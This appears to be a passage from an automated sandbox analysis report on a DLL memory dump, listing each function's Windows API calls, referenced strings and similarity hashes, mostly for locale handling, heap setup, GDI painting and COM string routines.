HKCR, xrefs: 6EA0E7C0
K;(Io, xrefs: 6EA0E6C4, 6EA0EA9D

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext$Task$Free$lstrcmpi$Alloc
String ID: }}$HKCR$HKCU{Software{Classes$K;(Io
API String ID: 2337762536-1319375077
Opcode ID: a78f84e754ea6fcc824563c424e19d28d818e180a720efaa99cd0384bc346470
Instruction ID: d8e12e5413d0b08c3994a6189204d4585ae382fb7aa817ba6b215de5a0b23203
Opcode Fuzzy Hash: a78f84e754ea6fcc824563c424e19d28d818e180a720efaa99cd0384bc346470
Instruction Fuzzy Hash: BAF1C131904319CFDF61DFE8D894B9EBBB9AF46708F1484A9E805EB284D7309C85DB54

Uniqueness

Uniqueness Score: -1.00%

Function 6EA34610, Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 253COMMON

Download Yara Rule

APIs

Part of subcall function 6EA2897C: GetLastError.KERNEL32(00000000,00000000,00000004,6EA1B7B1,00000000,00000000,00000000,?,6EA2D694,00000000,00000000,?,02E26558,00000000), ref: 6EA28981
Part of subcall function 6EA2897C: SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,6EA2D694,00000000,00000000,?,02E26558,00000000), ref: 6EA28A1F

GetACP.KERNEL32(00000055,?,?,?,?,?,6EA29DCB,?,?,?,?,?,?,00000004), ref: 6EA346D1
IsValidCodePage.KERNEL32(00000000,00000055,?,?,?,?,?,6EA29DCB,?,?,?,?,?,?,00000004), ref: 6EA346FC
_wcschr.LIBVCRUNTIME ref: 6EA34790
_wcschr.LIBVCRUNTIME ref: 6EA3479E
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,6EA29DCB,00000000,6EA29EEB), ref: 6EA34861

Strings

K;(Io, xrefs: 6EA34818
utf8, xrefs: 6EA347CE

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
String ID: K;(Io$utf8
API String ID: 4147378913-199971761
Opcode ID: e4ccd518092fe3282b534607a436913ae634093d2f9d6e0a05dde68959c8074d
Instruction ID: a17c51213fd6c82d3f2a5fa44b5369407fc0c806698763bb7321877fa7ddae65
Opcode Fuzzy Hash: e4ccd518092fe3282b534607a436913ae634093d2f9d6e0a05dde68959c8074d
Instruction Fuzzy Hash: D7710571604726AAE7149FB5CD40BE677BCEF45304F34486AE915EB180EB72DCC28768

Uniqueness

Uniqueness Score: -1.00%

Function 6EA12C70, Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 404COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(6EA00000,?,00000104), ref: 6EA12E5C
GetModuleHandleW.KERNEL32(00000000), ref: 6EA130C6

Part of subcall function 6EA07B50: RaiseException.KERNEL32(?,?,00000000,00000000), ref: 6EA07B5D

Strings

REGISTRY, xrefs: 6EA131F2
Module, xrefs: 6EA13171
K;(Io, xrefs: 6EA12C87
Module_Raw, xrefs: 6EA131A0

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Module$ExceptionFileHandleNameRaise
String ID: K;(Io$Module$Module_Raw$REGISTRY
API String ID: 1728487212-2849904609
Opcode ID: 339ad531ca0c4f9859c5d6797ba59095e976902492e2b58d7b6f2fb22b48400a
Instruction ID: a2ae53ac97d6c8f9c0c0a7d50eb1ac76f4c63a5df90a8b3f36dfff8c4eff4900
Opcode Fuzzy Hash: 339ad531ca0c4f9859c5d6797ba59095e976902492e2b58d7b6f2fb22b48400a
Instruction Fuzzy Hash: BAE1B075A082258BDB649F94DD54BDA73B8AF46308F0504ACD80EA7640EB74EEC4CF5A

Uniqueness

Uniqueness Score: -1.00%

Function 6EA34F7F, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

Part of subcall function 6EA2897C: GetLastError.KERNEL32(00000000,00000000,00000004,6EA1B7B1,00000000,00000000,00000000,?,6EA2D694,00000000,00000000,?,02E26558,00000000), ref: 6EA28981
Part of subcall function 6EA2897C: SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,6EA2D694,00000000,00000000,?,02E26558,00000000), ref: 6EA28A1F

Part of subcall function 6EA2897C: _free.LIBCMT ref: 6EA289DE
Part of subcall function 6EA2897C: _free.LIBCMT ref: 6EA28A14

GetUserDefaultLCID.KERNEL32(00000055,?,?), ref: 6EA3508B
IsValidCodePage.KERNEL32(00000000), ref: 6EA350D6
IsValidLocale.KERNEL32(?,00000001), ref: 6EA350E5
GetLocaleInfoW.KERNEL32(?,00001001,6EA29DC4,00000040,?,6EA29EE4,00000055,00000000,?,?,00000055,00000000), ref: 6EA3512D
GetLocaleInfoW.KERNEL32(?,00001002,6EA29E44,00000040), ref: 6EA3514C

Strings

K;(Io, xrefs: 6EA34F87

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
String ID: K;(Io
API String ID: 949163717-79920696
Opcode ID: 36a0ab39bbae56f84e8031be5ff54464caea310659e81864753d6249badf7e5a
Instruction ID: 1f8bcc56cc4511423df52e27a1399ea97c56720ffb7c5cd835d0abfca729a91f
Opcode Fuzzy Hash: 36a0ab39bbae56f84e8031be5ff54464caea310659e81864753d6249badf7e5a
Instruction Fuzzy Hash: F6519371900626AFEF50DFE9CC40AEA77B8FF06700F294425A914EB150D7729D858BA5

Uniqueness

Uniqueness Score: -1.00%

Function 6EA17334, Relevance: 9.0, APIs: 6, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000C,6EA17250,00000000,?,6EA173E8,00000000), ref: 6EA17336
GetProcessHeap.KERNEL32(00000008,00000008,00000000,00000000), ref: 6EA1735D
HeapAlloc.KERNEL32(00000000), ref: 6EA17364
InitializeSListHead.KERNEL32(00000000), ref: 6EA17371
GetProcessHeap.KERNEL32(00000000,00000000), ref: 6EA17386
HeapFree.KERNEL32(00000000), ref: 6EA1738D

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Process$AllocFeatureFreeHeadInitializeListPresentProcessor
String ID:
API String ID: 1475849761-0
Opcode ID: 0e6e3127b331b820b04241d54fcd5bfee470b97e65d3b13a49047959b72b0a04
Instruction ID: c231b0eb25070f2947389bcb5d2586354b082a208a8cfbc6c77e26ec41eb3f5b
Opcode Fuzzy Hash: 0e6e3127b331b820b04241d54fcd5bfee470b97e65d3b13a49047959b72b0a04
Instruction Fuzzy Hash: BAF04F75214B119BDF619FB9CC0CB5637AABB87712F159828F98AEB280DB35C4428A50

Uniqueness

Uniqueness Score: -1.00%

Function 6EA34DA4, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(51CEB70F,2000000B,00000000,00000002,00000000,?,?,?,6EA350CA,?,00000000), ref: 6EA34E3D
GetLocaleInfoW.KERNEL32(51CEB70F,20001004,00000000,00000002,00000000,?,?,?,6EA350CA,?,00000000), ref: 6EA34E66
GetACP.KERNEL32(?,?,6EA350CA,?,00000000), ref: 6EA34E7B

Strings

ACP, xrefs: 6EA34DC2
OCP, xrefs: 6EA34DF8

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 0369fd9a116b41f93722edae9f1c3b520ac8a4f87435faf28b32e1a53129eb61
Instruction ID: a0ceb0dd89e537e52ffe8540ab33c20e33bec329d54cdd13d5fb3f0f7122e6ad
Opcode Fuzzy Hash: 0369fd9a116b41f93722edae9f1c3b520ac8a4f87435faf28b32e1a53129eb61
Instruction Fuzzy Hash: 4421D636A14121AADB648FE5D800AC773BBAF41F51B3A8566E919DB108E733DDC3C358

Uniqueness

Uniqueness Score: -1.00%

Function 6EA34A27, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

Part of subcall function 6EA2897C: GetLastError.KERNEL32(00000000,00000000,00000004,6EA1B7B1,00000000,00000000,00000000,?,6EA2D694,00000000,00000000,?,02E26558,00000000), ref: 6EA28981
Part of subcall function 6EA2897C: SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,6EA2D694,00000000,00000000,?,02E26558,00000000), ref: 6EA28A1F

Part of subcall function 6EA2897C: _free.LIBCMT ref: 6EA289DE
Part of subcall function 6EA2897C: _free.LIBCMT ref: 6EA28A14

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6EA34A7B
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6EA34AC5
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6EA34B8B

Strings

K;(Io, xrefs: 6EA34A32

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLocale$ErrorLast_free
String ID: K;(Io
API String ID: 3140898709-79920696
Opcode ID: e68024e0bb32aa06a8a157a4faa29e6dc2188d8b09ce3d599b155782efa5ec9a
Instruction ID: 8d9a379229bc6e6100910bc51b913b257f195cf63cce1cd32cb613b0cf515a94
Opcode Fuzzy Hash: e68024e0bb32aa06a8a157a4faa29e6dc2188d8b09ce3d599b155782efa5ec9a
Instruction Fuzzy Hash: 9C61E2715142279FEB548F68CD81BAAB7A8FF04300F2481B9E925C7284E736DDD6CB58

Uniqueness

Uniqueness Score: -1.00%

Function 6EA1D436, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6EA1D52E
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6EA1D538
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6EA1D545

Strings

K;(Io, xrefs: 6EA1D441

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID: K;(Io
API String ID: 3906539128-79920696
Opcode ID: 9820f92e3dc4a72a5fefd267eeb02f7ddac0d4f944506a538f841ba75773c57b
Instruction ID: a73e52430c4941d5f0a354c6dcc3cd5f32757c7bdac025d252b336bf5d403f22
Opcode Fuzzy Hash: 9820f92e3dc4a72a5fefd267eeb02f7ddac0d4f944506a538f841ba75773c57b
Instruction Fuzzy Hash: 8731C474905228ABCB21DF68D9887C9BBB8BF08315F5085DAE41CAB250EB309F858F44

Uniqueness

Uniqueness Score: -1.00%

Function 6EA14E67, Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6EA14E73
IsDebuggerPresent.KERNEL32 ref: 6EA14F3F
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6EA14F5F
UnhandledExceptionFilter.KERNEL32(?), ref: 6EA14F69

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: dbd52772d5da3308a9b1c751ea555dae5708e0ff64cd1037c769f5c25f00f7b3
Instruction ID: 795a1a2353b9250367c2758d5e15b8bfb5073a1f3fbe3a881dc0c31214fbf653
Opcode Fuzzy Hash: dbd52772d5da3308a9b1c751ea555dae5708e0ff64cd1037c769f5c25f00f7b3
Instruction Fuzzy Hash: 65313875D093289BDF20DFA4C9897CDBBF8BF08309F1040AAE54CAB240EB715A858F44

Uniqueness

Uniqueness Score: -1.00%

Function 6EA1461A, Relevance: 6.0, APIs: 4, Instructions: 12COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,6EA1473A,6EA3A3AC), ref: 6EA1461F
UnhandledExceptionFilter.KERNEL32(6EA1473A,?,6EA1473A,6EA3A3AC), ref: 6EA14628
GetCurrentProcess.KERNEL32(C0000409,?,6EA1473A,6EA3A3AC), ref: 6EA14633
TerminateProcess.KERNEL32(00000000,?,6EA1473A,6EA3A3AC), ref: 6EA1463A

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID:
API String ID: 3231755760-0
Opcode ID: 407ac3ee9adcd7266011fc0bcb9134787fdb7d4ca09595291d306fb0d9f67859
Instruction ID: 85ad3a65a3b58a0a00f74369aa68a539817472694ac58e7dadf590ced55ea72d
Opcode Fuzzy Hash: 407ac3ee9adcd7266011fc0bcb9134787fdb7d4ca09595291d306fb0d9f67859
Instruction Fuzzy Hash: B8D0CA32000B28AFDF202BE0CC0CA183A2AEB0B206F04C810F70AEA012CA3144028BA1

Uniqueness

Uniqueness Score: -1.00%

Function 6EA08980, Relevance: 44.2, APIs: 20, Strings: 5, Instructions: 439memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 6EA08AD7
VariantInit.OLEAUT32(?), ref: 6EA08B06
VariantCopy.OLEAUT32(?,?), ref: 6EA08B14
SysFreeString.OLEAUT32(00000000), ref: 6EA08B5B
SysFreeString.OLEAUT32(-00000001), ref: 6EA08BEE
VariantClear.OLEAUT32(?), ref: 6EA08C27
SysFreeString.OLEAUT32(-00000001), ref: 6EA08C3F
SysFreeString.OLEAUT32(00000000), ref: 6EA08C7A
SysFreeString.OLEAUT32(00000000), ref: 6EA08C93
MultiByteToWideChar.KERNEL32(00000003,00000000,lines,000000FF,00000000,00000000), ref: 6EA08D14
SysAllocStringLen.OLEAUT32(00000000,-00000001), ref: 6EA08D1E
MultiByteToWideChar.KERNEL32(00000003,00000000,lines,000000FF,00000000,00000000), ref: 6EA08D3B
VarBstrCmp.OLEAUT32(00000000,00000000,00000400,00000000), ref: 6EA08D50
SysFreeString.OLEAUT32(00000000), ref: 6EA08D5F
SysFreeString.OLEAUT32(00000000), ref: 6EA08DE8
SysFreeString.OLEAUT32(00000000), ref: 6EA08E2C
_com_issue_error.COMSUPP ref: 6EA08E6E
_com_issue_error.COMSUPP ref: 6EA08E74
_com_issue_error.COMSUPP ref: 6EA08E7E
SysFreeString.OLEAUT32(76AFD5B0), ref: 6EA08E84

Strings

offsetY, xrefs: 6EA08B22
", xrefs: 6EA08E37
K;(I, xrefs: 6EA08E5B
K;(Io, xrefs: 6EA08994
lines, xrefs: 6EA08D0B, 6EA08D32

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$Variant_com_issue_error$AllocByteCharMultiWide$BstrClearCopyInit
String ID: "$K;(I$K;(Io$lines$offsetY
API String ID: 1469084953-1736103719
Opcode ID: 9a2b2f1617243263fcc8dd9064942b5e7c18f5054041feff3944076312e12c30
Instruction ID: ccf0e3a155baaa26ee763ed56b1752ad2d56449d74931402b0671950117d3702
Opcode Fuzzy Hash: 9a2b2f1617243263fcc8dd9064942b5e7c18f5054041feff3944076312e12c30
Instruction Fuzzy Hash: 0CF1BE70A0130ADFEB40CFE4D954BAEBBB8AF45308F244558E415AB281DB75DD85CB68

Uniqueness

Uniqueness Score: -1.00%

Function 6EA11240, Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 187windowCOMMON

Download Yara Rule

APIs

BeginPaint.USER32(?,?), ref: 6EA112F3
GetParent.USER32(?), ref: 6EA112FC
GetClientRect.USER32 ref: 6EA11312
CreateCompatibleDC.GDI32(?), ref: 6EA11318
CreateCompatibleBitmap.GDI32(?,?,?), ref: 6EA1133A
SelectObject.GDI32(00000000,00000000), ref: 6EA11346
SelectObject.GDI32(00000000,?), ref: 6EA11358
SendMessageW.USER32(?,00000014,00000000,00000000), ref: 6EA11371
SendMessageW.USER32(?,0000000F,?,00000000), ref: 6EA1137F
SetBkMode.GDI32(?,00000001), ref: 6EA11388
SetTextColor.GDI32(?,00FFFFFF), ref: 6EA11394
GetClientRect.USER32 ref: 6EA113A6
ClientToScreen.USER32(?,?), ref: 6EA113B4
ClientToScreen.USER32(?,?), ref: 6EA113C9
ClientToScreen.USER32(?,?), ref: 6EA113EB

Part of subcall function 6EA10DF0: GetTextMetricsW.GDI32(?,?,?,?,?,?,?,6EA11419,?,00000000,?), ref: 6EA10E7E

BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 6EA1144D
SelectObject.GDI32(?,?), ref: 6EA11458
SelectObject.GDI32(?,?), ref: 6EA11463
DeleteObject.GDI32(?), ref: 6EA1146D
DeleteDC.GDI32(?), ref: 6EA11474
EndPaint.USER32(?,?), ref: 6EA11482

Strings

K;(Io, xrefs: 6EA112BC

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ClientObject$Select$Screen$CompatibleCreateDeleteMessagePaintRectSendText$BeginBitmapColorMetricsModeParent
String ID: K;(Io
API String ID: 1460541294-79920696
Opcode ID: 1d9aa57a635359f54e20dc72a5ccd27ab5fc17b217164995adb39805a13c6ba3
Instruction ID: dac921abe999155510c5ced708053b65ffc096fea2b792caeaf5834104ec16a0
Opcode Fuzzy Hash: 1d9aa57a635359f54e20dc72a5ccd27ab5fc17b217164995adb39805a13c6ba3
Instruction Fuzzy Hash: EB613D71108B11AFDB209FA4CD08B5BBBE9FF89710F008A1CF695D61A0C775A9458F96

Uniqueness

Uniqueness Score: -1.00%

Function 6EA112B0, Relevance: 38.6, APIs: 21, Strings: 1, Instructions: 141windowCOMMON

Download Yara Rule

APIs

BeginPaint.USER32(?,?), ref: 6EA112F3
GetParent.USER32(?), ref: 6EA112FC
GetClientRect.USER32 ref: 6EA11312
CreateCompatibleDC.GDI32(?), ref: 6EA11318
CreateCompatibleBitmap.GDI32(?,?,?), ref: 6EA1133A
SelectObject.GDI32(00000000,00000000), ref: 6EA11346
SelectObject.GDI32(00000000,?), ref: 6EA11358
SendMessageW.USER32(?,00000014,00000000,00000000), ref: 6EA11371
SendMessageW.USER32(?,0000000F,?,00000000), ref: 6EA1137F
SetBkMode.GDI32(?,00000001), ref: 6EA11388
SetTextColor.GDI32(?,00FFFFFF), ref: 6EA11394
GetClientRect.USER32 ref: 6EA113A6
ClientToScreen.USER32(?,?), ref: 6EA113B4
ClientToScreen.USER32(?,?), ref: 6EA113C9
ClientToScreen.USER32(?,?), ref: 6EA113EB
BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 6EA1144D
SelectObject.GDI32(?,?), ref: 6EA11458
SelectObject.GDI32(?,?), ref: 6EA11463
DeleteObject.GDI32(?), ref: 6EA1146D
DeleteDC.GDI32(?), ref: 6EA11474
EndPaint.USER32(?,?), ref: 6EA11482

Strings

K;(Io, xrefs: 6EA112BC

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ClientObject$Select$Screen$CompatibleCreateDeleteMessagePaintRectSend$BeginBitmapColorModeParentText
String ID: K;(Io
API String ID: 2796758630-79920696
Opcode ID: 5b1affec323c41395e5fa3db79e48fdc5923a88ee9d74d7f70eb02dc91de0878
Instruction ID: 2ed12c65c35e26e49455868fa69ed39c391db410726dc267eef61ad0c77cd352
Opcode Fuzzy Hash: 5b1affec323c41395e5fa3db79e48fdc5923a88ee9d74d7f70eb02dc91de0878
Instruction Fuzzy Hash: 2D511971108B51AFDB209F64CD08F6ABBE9FF89300F00491DF695E6160DB36A9468F92

Uniqueness

Uniqueness Score: -1.00%

Function 6EA26040, Relevance: 28.3, APIs: 15, Strings: 1, Instructions: 343COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6EA260B0
_free.LIBCMT ref: 6EA260C5
_free.LIBCMT ref: 6EA260DA
_free.LIBCMT ref: 6EA260EF
_free.LIBCMT ref: 6EA26104
GetCPInfo.KERNEL32(?,?), ref: 6EA2614E

Part of subcall function 6EA2DBB5: _free.LIBCMT ref: 6EA2DC20

_free.LIBCMT ref: 6EA26392
_free.LIBCMT ref: 6EA263A5
_free.LIBCMT ref: 6EA263B3
_free.LIBCMT ref: 6EA263BE
_free.LIBCMT ref: 6EA26400
_free.LIBCMT ref: 6EA26408
_free.LIBCMT ref: 6EA26410
_free.LIBCMT ref: 6EA26418
_free.LIBCMT ref: 6EA26426

Strings

K;(Io, xrefs: 6EA26048

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$Info
String ID: K;(Io
API String ID: 2509303402-79920696
Opcode ID: baaee8edbd923c8a06991e3a7df125aeeebc081748f6b67c1d8fd8b014530f85
Instruction ID: 7953cd59f6eb1bd8d8f03f4768a84f1500d74024cb774e8d4c72a3f7f6cfadda
Opcode Fuzzy Hash: baaee8edbd923c8a06991e3a7df125aeeebc081748f6b67c1d8fd8b014530f85
Instruction Fuzzy Hash: 12D18C71D016069FDB108FA8C980BEEBBB5FF48300F188579E995B7381D775A885CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 6EA07ED0, Relevance: 28.2, APIs: 11, Strings: 5, Instructions: 156memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 6EA07F46
VariantInit.OLEAUT32(?), ref: 6EA07F78
VariantChangeType.OLEAUT32(?,?,00000000,00000008), ref: 6EA07FA0
SysFreeString.OLEAUT32(-00000001), ref: 6EA07FE1
SysAllocString.OLEAUT32(?), ref: 6EA08049
VariantClear.OLEAUT32(?), ref: 6EA0806B
_com_issue_error.COMSUPP ref: 6EA08096
_com_issue_error.COMSUPP ref: 6EA080A0
_com_issue_error.COMSUPP ref: 6EA080A6
_com_issue_error.COMSUPP ref: 6EA080B0
_com_issue_error.COMSUPP ref: 6EA080BA

Strings

K;(Io, xrefs: 6EA07EE4
counter, xrefs: 6EA0841B, 6EA08446
name, xrefs: 6EA0814A
value, xrefs: 6EA08288
page, xrefs: 6EA087CB, 6EA087F6

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: _com_issue_error$StringVariant$Alloc$ChangeClearFreeInitType
String ID: K;(Io$counter$name$page$value
API String ID: 661817203-927108579
Opcode ID: 5a088ab645cf0f4ccdc4c9e080ccbce1e4417039bed0dfed41a7daf5aec05d92
Instruction ID: 9df58b0fd52a6d3edb910fc7a47f6a505d680f1307a991f22f14aa6920992097
Opcode Fuzzy Hash: 5a088ab645cf0f4ccdc4c9e080ccbce1e4417039bed0dfed41a7daf5aec05d92
Instruction Fuzzy Hash: 43510671904716DBEB20DFE4DD44B8AB7F8AF05718F204A19E855E7280E774EAC0C7A8

Uniqueness

Uniqueness Score: -1.00%

Function 6EA10DF0, Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 298COMMON

Download Yara Rule

APIs

GetTextMetricsW.GDI32(?,?,?,?,?,?,?,6EA11419,?,00000000,?), ref: 6EA10E7E
GetClientRect.USER32 ref: 6EA110CF
GetDeviceCaps.GDI32(?,0000005A), ref: 6EA11134
MulDiv.KERNEL32(?,00000000,00000048), ref: 6EA11149
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 6EA11169
SetTextColor.GDI32(?,?), ref: 6EA11181
SelectObject.GDI32(?,00000000), ref: 6EA11189
DrawTextW.USER32(?,?,?,?,00000000), ref: 6EA111C1
SelectObject.GDI32(?,00000000), ref: 6EA111C9
DeleteObject.GDI32(00000000), ref: 6EA111D0

Strings

[N/A], xrefs: 6EA10F93
%s%s%s, xrefs: 6EA1106D
K;(Io, xrefs: 6EA10DFD
%s%d.%d%s, xrefs: 6EA11014

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
